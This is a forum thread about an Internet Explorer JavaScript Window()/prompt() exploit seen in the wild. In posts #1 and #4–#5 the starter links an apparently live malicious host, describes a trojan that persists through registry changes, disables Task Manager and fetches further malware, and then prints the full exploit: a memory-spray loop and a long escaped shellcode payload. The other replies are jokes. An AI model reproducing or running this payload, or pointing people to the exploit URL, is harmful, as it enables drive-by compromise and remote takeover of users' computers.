+ Reply to Thread
Showing results 1 to 8 of 8

Thread: MSIE Exploit: Javascript Window() exploit code in wild

  1. #1
    indulgence
    indulgence 15 0FF11|\|3
    Jackhammer Jesus Retired Staff Member

    Disciple     indulgence is just really nice indulgence is just really nice indulgence's Avatar
    Join Date
    Jan 1970
    Posts
    520
    Downloads
    4
    Uploads
    0

    MSIE Exploit: Javascript Window() exploit code in wild

    http://85.255.113.242/adv/052

    Now - i was browsing a site that had apparently been hacked and had a link to this exploit code - so i decided to restrict my access through my router to really limit any potential problems and decided to give it a go.

    This one is a much better example than any PoC i've seen on the exploit to date.
    The 'trojan' it loads is also pretty nifty. It drops a file named 'boot.itx' on your %root% directory -- which keeps a file named 'kernels64.exe' to your %windows%\system32 directory. The boot.itx gets loaded into your explorer.exe through a registry hack i've not seen used by trojans before. Boot.itx ensures that kernels64 exists properly at random intervals... and keeps it running. It will also disable your Task manager so that you cannot ctl+alt+delete - which was mildly humorous at first... but got annoying after it keeps reseting it in registry.

    It will also query some ukranian ****ers webste [http://85.255.113.242/adv/soft/ ...]
    and download a couple of files which share names of windows programs [search.exe, winlogon.exe, etc...] which are - you guessed it - additional trojans... and also registers itself with a php script so the ****er can try to take over the box -- i have noticed some attempted connections on my router from disabled ports from 85.*.*.* ip addresses... which I can only guess is this ****er/his group/hsi friends...

    I would like to note that going to http://85.255.113.242/adv/052 on MSIE will indeed fingerbang you if you dont have javascript disabled.
    Reply With Quote Reply With Quote  
  2. #2
    lpxxfaintxx
    lpxxfaintxx 15 0FF11|\|3
    I hate Steve Jobs. Senior Member
    Gold Member

    Crusader     lpxxfaintxx has much to be proud of lpxxfaintxx has much to be proud of lpxxfaintxx has much to be proud of lpxxfaintxx has much to be proud of lpxxfaintxx has much to be proud of lpxxfaintxx has much to be proud of
    Join Date
    Jun 2005
    Location
    Fullerton, CA
    Posts
    3,244
    Downloads
    10
    Uploads
    0
    Send a message via AIM to lpxxfaintxx Send a message via MSN to lpxxfaintxx Send a message via Skype™ to lpxxfaintxx

    ...umm.. Thanks for the warning?
    Reply With Quote Reply With Quote  
  3. #3
    SatansMessiah
    SatansMessiah 15 0FF11|\|3
    Never interrupt ur enemy when hes making a mistake Senior Member
    Gold Member

    Blessed     SatansMessiah is a name known to all SatansMessiah is a name known to all SatansMessiah is a name known to all SatansMessiah is a name known to all SatansMessiah is a name known to all SatansMessiah's Avatar
    Join Date
    Oct 2005
    Location
    Either Heaven Or Hell Both scary
    Posts
    2,108
    Downloads
    4
    Uploads
    0
    Send a message via AIM to SatansMessiah

    So many noobs are going to click that link before they read through the post, lol I pitty them.
    Quote Originally Posted by dopesmoker View Post
    wrestling is pretty much grown men in tights looking for an excuse to touch each other.

    now, to watch me and my friends wrestle is a different story
    Reply With Quote Reply With Quote  
  4. #4
    indulgence
    indulgence 15 0FF11|\|3
    Jackhammer Jesus Retired Staff Member

    Disciple     indulgence is just really nice indulgence is just really nice indulgence's Avatar
    Join Date
    Jan 1970
    Posts
    520
    Downloads
    4
    Uploads
    0

    Well, it is sad when a wild exploit is this much better/more effective than the PoC shows...

    The PoC only works about 15% of the time for me... more often resulting in a simple IE crash (deref-ing invalid memory) -- this is a 100% effective hack

    [begin code]
    Code:
    var spearson=0
var eip = ""
var fillmem = ""


for (spearson=1 ; spearson <=500 ; spearson++)
{ 
  eip = eip + unescape("%u7030%u4300")
}

for (spearson=1 ; spearson <=200; spearson++) 
{ 
  fillmem = fillmem + eip
}
    Reply With Quote Reply With Quote  
  5. #5
    indulgence
    indulgence 15 0FF11|\|3
    Jackhammer Jesus Retired Staff Member

    Disciple     indulgence is just really nice indulgence is just really nice indulgence's Avatar
    Join Date
    Jan 1970
    Posts
    520
    Downloads
    4
    Uploads
    0

    Code:
    fillmem = fillmem + unescape

("%uEED9%uD99B%u2474%u5EF4%uC02B%uAC2D%uFFF6%u2BFF"+
"%u60E0%uEC8B%uED83%u8BE0%u2BFD%u81C9%u60E9%uFFF7"+
"%uF3FF%u2BA4%u2DC0%uFFD2%uFFFF%uC503%uE0FF%uDD8B"+
"%uC92B%uE981%uFDE9%uFFFF%u7381%uA944%u4A67%u83CC"+
"%uFCEB%uF4E2%u3041%uCC48%uEAA9%u93FF%u67AA%u414A"+
"%uC714%uCC42%u8FA9%uCEFE%u67A9%u4E45%u6668%uCC4A"+
"%u27C3%uCC22%u6799%uA44A%u6EFD%uCC4A%u67C3%u59B5"+
"%u6F45%uCC4A%uA7A2%u4845%u660C%uCC4A%uE220%uC51A"+
"%u67A9%u39C1%u8F22%u34C1%u3310%uCC43%u94A9%u41EE"+
"%uF02C%uCC4A%u98A9%uA6AA%u0FAD%uFC4A%u67A9%uCC22"+
"%u66A9%uA64A%u98A9%u20DF%u67A1%uC74A%u6869%uA2CE"+
"%u67A8%u454A%u2F2C%uCC43%uEAA9%u8CCF%u67AC%u9C4A"+
"%uF256%uC49E%u67A9%u0C41%uE3A6%uCD19%u67A9%u79C7"+
"%u6361%uCC4A%uDA24%uC55A%u67A9%uE3A2%u67AB%uC34A"+
"%u5B2B%uCC4B%u0DA9%uA64A%u0DA9%uA64A%uEAA9%u9CCF"+
"%u67AC%u9C4A%uF256%uC55A%u67A9%u0C41%uE3A6%uCD55"+
"%u67A9%u49C3%u6E9D%uCC4A%u67C3%uCC20%u64C3%uCC20"+
"%u67C3%u9C20%uE224%uC9E8%u67A9%u471A%u532C%uCC43"+
"%u37A9%u59B5%u6E89%uCC4A%uA7A2%u4845%u6758%uCC4A"+
"%uE220%uC572%u67A9%uCD20%u67C1%u8C4A%u0DA9%uA64A"+
"%u0DA9%u414A%uC62C%uCC4C%u37A9%u49C7%u62E5%uCC4A"+
"%uECF9%uF4CF%u67A0%u9C4A%uF256%uC56E%u67A9%u0C41"+
"%uE3A6%uCCF1%u67A9%u49C3%u6E95%uCC4A%u67C3%uCC20"+
"%u67C3%uCC20%uE222%uC576%u67A9%u331A%u4F3C%uCC43"+
"%u6CA9%uC38A%uFF2D%uCC4A%uEEA9%u8CCF%u67A0%u414A"+
"%u232C%uCC43%u37A9%u3322%u6756%u474A%u2F2C%uCC43"+
"%u37A9%u49C1%u6E95%uCC4A%u98F9%uD4DF%u67A0%uC74A"+
"%u1369%u4796%u232C%uCC43%u6CA9%uB88A%uEC7B%uF0CF"+
"%u67A0%u9C4A%uF256%uC556%u67A9%u49C1%u6E91%uCC4A"+
"%u98F9%uD0DF%u67A0%u474A%u532C%uCC43%u37A9%u59B5"+
"%u6EB5%uCC4A%u6511%uCC4A%uEAA9%u6CD7%u67AE%u244A"+
"%u679C%uCC4A%uDA22%uC502%u67A9%u79C1%u6EED%uCC4A"+
"%u0641%uCC4A%uECA9%uE0CF%u67A0%u9C4A%uF256%uC48A"+
"%u67A9%uCD20%uE224%uCBEA%u67A9%u331A%u9F3C%uCC42"+
"%u0DA9%u334A%u8F3C%uCC42%u07A9%uCC20%uE7C1%uCC4A"+
"%u37A9%uCC20%u64C3%uCC22%u67A9%u9F8A%uF256%uC4FA"+
"%u67A9%u49C3%u6E85%uCC4A%u2320%uD06E%uA4C8%uA62A"+
"%u33A9%u9B1C%uD256%uC566%u67A9%u59B5%u6F11%uCC4A"+
"%u2320%uD06E%uA4C8%uA62A%u33A9%u9B1C%uD256%uC566"+
"%u67A9%u59B5%u6F15%uCC4A%u2320%uD06E%uA4C8%uA62A"+
"%u8CAB%uAC42%u66C3%uCFA1%u0DC9%uA64A%u37A9%u79B5"+
"%u6E85%uCC4A%uF256%uC4FE%u67A9%u88C3%u7B8D%u0F2B"+
"%u03C9%u6D2D%u67A9%u5F0A%u2422%u8CB5%u9EDC%u97C1"+
"%u01AA%uAAD9%u5C28%u9607%u7DDD%u27CB%u67A9%uCC4B"+
"%uE6CF%u8171%u13F3%u4D47%u6742%uCD4A%u01A9%uF7CB"+
"%u3DE4%u3F3F%u3B20%uD06E%uA4C8%uFF2A%u317B%uF2CA"+
"%u13A9%u6A58%u9FDD%uF708%u7FF8%uDA3D%uA79A%u6205"+
"%u9ADC%u2714%u2141%uB8C3%u6F8D%u98C3%u478D%u94B2"+
"%uA4C8%u94B3%u236E%uD06E%u67A9%uCC4A%uA4C8%u472A"+
"%uEC71%uF001%u2B22%uB441%uACAA%u9DC1%u6489%u4799"+
"%u6493%u9BB1%u98C3%u63A2%u9856%uBEB5%u3884%u9B0D"+
"%u3622%uCF6E%u687A%uD8FD%uECEB%uD00B%uA4AA%uC8C1"+
"%u6439%u9A89%u1322%uC06E%u6320%u92F4%u1B22%uC86E"+
"%u5929%uB94A%u3F78%u3412%uA4C8%u94B3%u06F1%u8B89"+
"%u13CC%uB90C%u0BC5%uAD1A%u0FDD%uAD04%u02C4%uCC0B"+
"%u0EEF%uA824%u0EEF%uBF38%u21DD%uA023%u26CC%u8A4A"+
"%u09C0%u822E%u1FCC%u8A3E%u0BC0%u8D2F%u21A9%uA223"+
"%u24CD%uA326%u02DA%u8F4A%u02DB%uB82B%u21CC%uA023"+
"%u26CC%u9F4A%u13CC%uA50C%u02C5%uA31A%u09C0%uA93E"+
"%u67DB%uA918%u03C8%uA50C%u02C5%u9B4A%u0EDB%uA93E"+
"%u0EEF%uA926%u24A9%uA326%u02DA%uAD02%u03C7%uA926"+
"%u20A9%uA326%u06CB%u8D26%u0BC5%uAF25%u20A9%uA326"+
"%u06CB%u8A26%u02DB%uCC2F%u02EE%u8A3E%u0BC0%u9F2F"+
"%u1DC0%uCC2F%u02EE%u9A3E%u15CC%uA539%u09C6%u804A"+
"%u06C6%u802E%u05C0%uAD38%u1EDB%uCC0B%u02ED%uA926"+
"%u02DD%uA50C%u02C5%uCC0B%u02EE%u9F3E%u14D0%uA93E"+
"%u23C4%uBE23%u04CC%uA33E%u1EDB%u8F4A%u02DB%uB82B"+
"%u33CC%uBE22%u06CC%uCC2E%u0BFA%uA92F%u67D9%uB40F"+
"%u13C0%uBE1A%u04C6%uBF2F%u67DA%uA51C%u13DB%uAD3F"+
"%u26C5%uA026%u04C6%u9A4A%u15C0%uB93E%u0BC8%uA00B"+
"%u08C5%u8929%u67D1%uA51C%u13DB%uAD3F%u21C5%uA938"+
"%u67CC%uA51D%u22C7%uA932%u67CA%uBE09%u06CC%uA93E"+
"%u15F9%uAF25%u14CC%u8D39%u35A9%uBF2F%u0ADC%u982F"+
"%u15C1%uAD2F%u67CD%uBE1D%u13C0%u9C2F%u08DB%uA929"+
"%u14DA%uA907%u08C4%uB538%u24A9%uA938%u13C8%u9E2F"+
"%u0ACC%uB825%u33CC%uBE22%u06CC%uCC2E%u1FEC%uB823"+
"%u0FFD%uA938%u03C8%uCC4A%u09E0%uA93E%u09DB%uB82F"+
"%u17E6%uA22F%u67E8%uA203%u02DD%uA238%u13CC%uBC05"+
"%u09CC%uBE1F%u26C5%u854A%u13C7%uBE2F%u02C7%u9E3E"+
"%u06CC%u8A2E%u0BC0%uCC2F%u09E0%uA93E%u09DB%uB82F"+
"%u0BEA%uBF25%u2FCC%uA22B%u0BCD%uCC2F%u09E0%uA93E"+
"%u09DB%uB82F%u08EA%uA224%u04CC%u8D3E%u2FA9%uB83E"+
"%u28D9%uA93A%u35C7%uBD2F%u02DC%uB839%u67E8%uB802"+
"%u17DD%uA919%u03C7%uA918%u12D8%uBF2F%u26DD%uCC4A"+
"%u0EDE%uA524%u02C7%uE23E%u0BCD%uCC26%u22EE%uCC1E"+
"%u08E4%uA530%u0BC5%uE32B%u499D%uEC7A%u0481%uA125"+
"%u06D9%uA53E%u0BCB%uF72F%u2A89%u8519%u47EC%uE27C"+
"%u5C99%u9B6A%u09C0%uA32E%u14DE%u826A%u47FD%uE27F"+
"%u5C98%u9F6A%u56FF%uEC71%u1EE4%u8903%u5C9B%uE26A"+
"%u22E7%uEC1E%u2BEA%uEC18%u4998%uE27B%u549D%uFE78"+
"%u6780%uF972%u5587%uF97F%u5687%uFF7B%u5587%uFE7E"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u48A9%uA82B%u48DF%uF97A%u489B%uA53D%u54C7%uE278"+
"%u1FCC%uCC2F%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u5DCA%uAE16%u08C6%uE23E%u09C0%uCC32%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uCC4A%u67A9%uCC4A%u67A9%uCC4A%u67A9%u5C4A")

prompt(fillmem, fillmem)
    Reply With Quote Reply With Quote  
  6. #6
    punture
    punture 15 0FF11|\|3
    Senior Member

    Saint     punture has a brilliant future punture has a brilliant future punture has a brilliant future punture has a brilliant future punture has a brilliant future punture has a brilliant future punture has a brilliant future punture's Avatar
    Join Date
    Jul 2004
    Location
    Vancouver, B.C. Canada
    Posts
    6,418
    Downloads
    18
    Uploads
    0
    Send a message via AIM to punture Send a message via MSN to punture

    So what do you want us to do with it? Let other people click that link for fun ? :P
    Reply With Quote Reply With Quote  
  7. #7
    Greek
    Greek 15 0FF11|\|3
    Senior Member

    Inquisitor     Greek has a reputation beyond repute Greek has a reputation beyond repute Greek has a reputation beyond repute Greek has a reputation beyond repute Greek has a reputation beyond repute Greek has a reputation beyond repute Greek has a reputation beyond repute Greek's Avatar
    Join Date
    Jul 2005
    Location
    NJ
    Posts
    4,058
    Blog Entries
    1
    Downloads
    12
    Uploads
    0
    Send a message via AIM to Greek Send a message via MSN to Greek

    of course im gunna go hey look at this lol
    Reply With Quote Reply With Quote  
  8. #8
    punture
    punture 15 0FF11|\|3
    Senior Member

    Saint     punture has a brilliant future punture has a brilliant future punture has a brilliant future punture has a brilliant future punture has a brilliant future punture has a brilliant future punture has a brilliant future punture's Avatar
    Join Date
    Jul 2004
    Location
    Vancouver, B.C. Canada
    Posts
    6,418
    Downloads
    18
    Uploads
    0
    Send a message via AIM to punture Send a message via MSN to punture

    more like "Free Gay Porn!"
    Reply With Quote Reply With Quote  
+ Reply to Thread
« Previous Thread | Next Thread »

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

     

Similar Threads

  1. Javascript Code
    By WickedSickPenguin in forum Hardware and Software
    Replies: 6
    Last Post: 06-10-2005, 03:42 PM

Posting Rules

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts

Forum Rules